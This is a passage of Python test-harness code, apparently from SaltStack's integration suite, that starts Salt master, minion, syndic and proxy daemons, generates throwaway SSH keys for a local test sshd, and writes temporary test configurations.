self.minion_targets = set(['minion', 'sub_minion'])
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, 'ssh', False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name='salt-smaster',
daemon_id=self.syndic_master_opts['id'],
daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name='salt-syndic',
daemon_id=self.syndic_opts['id'],
daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']),
daemon_cli_script_name='syndic',
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts['id'])
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name='salt-proxy',
daemon_id=self.proxy_opts['id'],
daemon_log_prefix='salt-proxy/{}'.format(self.proxy_opts['id']),
daemon_cli_script_name='proxy',
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
'''
Create a roster file for salt's syndic
'''
roster_path = os.path.join(FILES, 'conf/_ssh/roster')
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
'''
Generate keys and start an ssh daemon on an alternate port
'''
sys.stdout.write(
' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format(
'SSH server',
**self.colors
)
)
keygen = salt.utils.path.which('ssh-keygen')
sshd = salt.utils.path.which('sshd')
if not (keygen and sshd):
print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'key_test',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_err)))
sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server')
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
        server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key.pub')
for server_key_file in (server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[keygen, '-t',
'dsa',
'-b',
'1024',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_dsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_dsa_err)))
keygen_process_ecdsa = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ecdsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_escda_err)))
keygen_process_ed25519 = subprocess.Popen(
[keygen, '-t',
'ed25519',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ed25519_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_ed25519_err)))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid')
self.sshd_process = subprocess.Popen(
[sshd, '-f', 'sshd_config', '-o', 'PidFile={0}'.format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print('sshd had errors on startup: {0}'.format(salt.utils.stringutils.to_str(sshd_err)))
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
self.prep_syndic()
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
sys.stdout.write(
' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
**self.colors
)
)
@classmethod
def config(cls, role):
'''
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
'''
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
        This client is defined as a class attribute because its creation needs
        to be deferred to a later stage. If it were created on `__enter__`, as it
        previously was, it would not receive the master events.
'''
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.master_opts
)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = 'cache'
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
master_opts['pki_dir'] = 'pki'
master_opts['syndic_master'] = 'localhost'
file_tree = {
'root_dir': os.path.join(FILES, 'pillar', 'base', 'file_tree'),
'follow_dir_links': False,
'keep_newline': True,
}
master_opts['ext_pillar'].append({'file_tree': file_tree})
# Config settings to test `event_return`
if 'returner_dirs' not in master_opts:
master_opts['returner_dirs'] = []
master_opts['returner_dirs'].append(os.path.join(RUNTIME_VARS.FILES, 'returners'))
master_opts['event_return'] = 'runtests_noop'
        # Under Windows we can't seem to properly create a virtualenv off of another
        # virtualenv. On Linux we can, but we still point to the virtualenv binary
        # outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.is_windows():
virtualenv_binary = os.path.join(real_prefix, 'Scripts', 'virtualenv.exe')
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get('PATH')
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ['PATH'] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.which('virtualenv')
if path is not None:
# Restore previous environ PATH
os.environ['PATH'] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = 'cache'
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
minion_opts['pki_dir'] = 'pki'
minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
minion_opts['venv_bin'] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = 'cache'
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = 'pki'
sub_minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
sub_minion_opts['venv_bin'] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
syndic_master_opts['cachedir'] = 'cache'
syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['pki_dir'] = 'pki'
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['cachedir'] = 'cache'
syndic_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = 'cache'
# proxy_opts['user'] = running_tests_user
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = 'pki'
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# Set up config options that require internal data
master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
minion_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
'base': [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, 'file', 'base'),
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
minion_opts['file_roots'] = {
'base': [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, 'file', 'base'),
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, syndic_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
# all read, only owner write
autosign_file_permissions = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(opts_dict['root_dir'], 'autosign_file')
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'autosign_file'),
new_autosign_file_path
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
proxy_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts, proxy_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
conf['runtests_log_level'] = os.environ.get('TESTS_MIN_LOG_LEVEL_NAME') or 'debug'
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
salt.utils.yaml.safe_dump(computed_config, fp_, default_flow_style=False)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(sub_minion_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_master_computed_config, wfh, default_flow_style=False)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
)
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
try:
if hasattr(self.sub_minion_process, 'terminate'):
self.sub_minion_process.terminate()
else:
